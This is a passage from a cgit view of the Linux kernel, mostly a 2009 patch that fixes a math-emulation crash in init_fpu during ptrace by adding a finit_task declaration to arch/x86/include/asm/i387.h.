MAX_EFI_IO_PAGES - 1, #ifdef CONFIG_PARAVIRT FIX_PARAVIRT_BOOTMAP, #endif -- cgit v1.2.3 From ab9e18587f4cdb5f3fb3854c732f27a36f98e8f6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Daniel=20Gl=C3=B6ckner?= Date: Wed, 4 Mar 2009 19:42:27 +0100 Subject: x86, math-emu: fix init_fpu for task != current MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Impact: fix math-emu related crash while using GDB/ptrace init_fpu() calls finit to initialize a task's xstate, while finit always works on the current task. If we use PTRACE_GETFPREGS on another process and both processes did not already use floating point, we get a null pointer exception in finit. This patch creates a new function finit_task that takes a task_struct parameter. finit becomes a wrapper that simply calls finit_task with current. On the plus side this avoids many calls to get_current which would each resolve to an inline assembler mov instruction. An empty finit_task has been added to i387.h to avoid linker errors in case the compiler still emits the call in init_fpu when CONFIG_MATH_EMULATION is not defined. The declaration of finit in i387.h has been removed as the remaining code using this function gets its prototype from fpu_proto.h. Signed-off-by: Daniel Glöckner Cc: Suresh Siddha Cc: "Pallipadi Venkatesh" Cc: Arjan van de Ven Cc: Bill Metzenthen LKML-Reference: Signed-off-by: Ingo Molnar --- arch/x86/include/asm/i387.h | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) (limited to 'arch/x86/include') diff --git a/arch/x86/include/asm/i387.h b/arch/x86/include/asm/i387.h index 48f0004db8c..71c9e518398 100644 --- a/arch/x86/include/asm/i387.h +++ b/arch/x86/include/asm/i387.h @@ -172,7 +172,13 @@ static inline void __save_init_fpu(struct task_struct *tsk) #else /* CONFIG_X86_32 */ -extern void finit(void); +#ifdef CONFIG_MATH_EMULATION +extern void finit_task(struct task_struct *tsk); +#else +static inline void finit_task(struct task_struct *tsk) +{ +} +#endif static inline void tolerant_fwait(void) { -- cgit v1.2.3